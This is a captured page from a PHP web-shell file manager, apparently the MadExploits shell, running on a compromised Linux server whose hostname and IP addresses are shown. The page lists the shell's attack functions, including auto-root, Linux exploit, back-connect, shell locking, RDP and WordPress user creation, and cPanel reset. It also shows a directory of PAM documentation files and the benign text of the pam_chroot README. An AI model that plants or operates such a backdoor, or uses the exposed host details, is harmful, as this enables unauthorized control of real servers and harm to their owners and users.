Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.23.101.241
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pam-1.1.8 /
txts /
[ HOME SHELL ]
Name
Size
Permission
Action
README.pam_access
4.84
KB
-rw-r--r--
README.pam_chroot
1.47
KB
-rw-r--r--
README.pam_console
1.88
KB
-rw-r--r--
README.pam_cracklib
9.53
KB
-rw-r--r--
README.pam_debug
1.95
KB
-rw-r--r--
README.pam_deny
1.01
KB
-rw-r--r--
README.pam_echo
1.07
KB
-rw-r--r--
README.pam_env
3.07
KB
-rw-r--r--
README.pam_exec
2.21
KB
-rw-r--r--
README.pam_faildelay
827
B
-rw-r--r--
README.pam_faillock
7.94
KB
-rw-r--r--
README.pam_filter
3.03
KB
-rw-r--r--
README.pam_ftp
1.66
KB
-rw-r--r--
README.pam_group
2.09
KB
-rw-r--r--
README.pam_issue
1.32
KB
-rw-r--r--
README.pam_keyinit
2.19
KB
-rw-r--r--
README.pam_lastlog
2.21
KB
-rw-r--r--
README.pam_limits
2.36
KB
-rw-r--r--
README.pam_listfile
3.54
KB
-rw-r--r--
README.pam_localuser
1.14
KB
-rw-r--r--
README.pam_loginuid
986
B
-rw-r--r--
README.pam_mail
1.96
KB
-rw-r--r--
README.pam_mkhomedir
1.33
KB
-rw-r--r--
README.pam_motd
755
B
-rw-r--r--
README.pam_namespace
10.75
KB
-rw-r--r--
README.pam_nologin
1.32
KB
-rw-r--r--
README.pam_permit
907
B
-rw-r--r--
README.pam_postgresok
346
B
-rw-r--r--
README.pam_pwhistory
1.89
KB
-rw-r--r--
README.pam_rhosts
1.84
KB
-rw-r--r--
README.pam_rootok
1.06
KB
-rw-r--r--
README.pam_securetty
1.31
KB
-rw-r--r--
README.pam_selinux
2.84
KB
-rw-r--r--
README.pam_sepermit
1.61
KB
-rw-r--r--
README.pam_shells
652
B
-rw-r--r--
README.pam_stress
2.01
KB
-rw-r--r--
README.pam_succeed_if
2.8
KB
-rw-r--r--
README.pam_tally
4.67
KB
-rw-r--r--
README.pam_tally2
5.52
KB
-rw-r--r--
README.pam_time
1.27
KB
-rw-r--r--
README.pam_timestamp
1.48
KB
-rw-r--r--
README.pam_tty_audit
2.71
KB
-rw-r--r--
README.pam_umask
1.59
KB
-rw-r--r--
README.pam_unix
6.91
KB
-rw-r--r--
README.pam_userdb
2.81
KB
-rw-r--r--
README.pam_warn
1.2
KB
-rw-r--r--
README.pam_wheel
1.92
KB
-rw-r--r--
README.pam_xauth
3.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.pam_chroot
This pam_chroot module provides session support only. It is based almost entirely on Matthew Kirkwood's original version obtained from ftp://ferret.lmh.ox.ac.uk/users/weejock/pam_chroot/. Operation: When the calling application attempts to open a session, pam_chroot opens /etc/security/chroot.conf and searches for a line of the form: user directory where the "user" listed is actually a regular expression. If the PAM_USER for whom the session is being opened matches the regular expression, the module will attempt to chroot() to the given directory. Optional arguments: "debug" Log debug messages to syslog. "onerr=" Values can be "succeed" or "fail". The action to take if the configuration file can not be opened, the chroot() fails, or the user does not match any of the expressions listed in the configuration file. Default is "succeed". Other Notes: The calling application must be executing with root privileges in order to be able to chroot() at all. If the application needs to exec() other programs (such as a server process or spawning a shell), you will need to duplicate some portions of an actual root environment under the chroot()ed directory in order for it to work at all. (This includes configuration and logging files.) If configured incorrectly, this module may potentially render the service unusable and, under some circumstances, pose a security risk. In particular, the new root directory and all of its parent directories must not be writable by anyone but root.
Close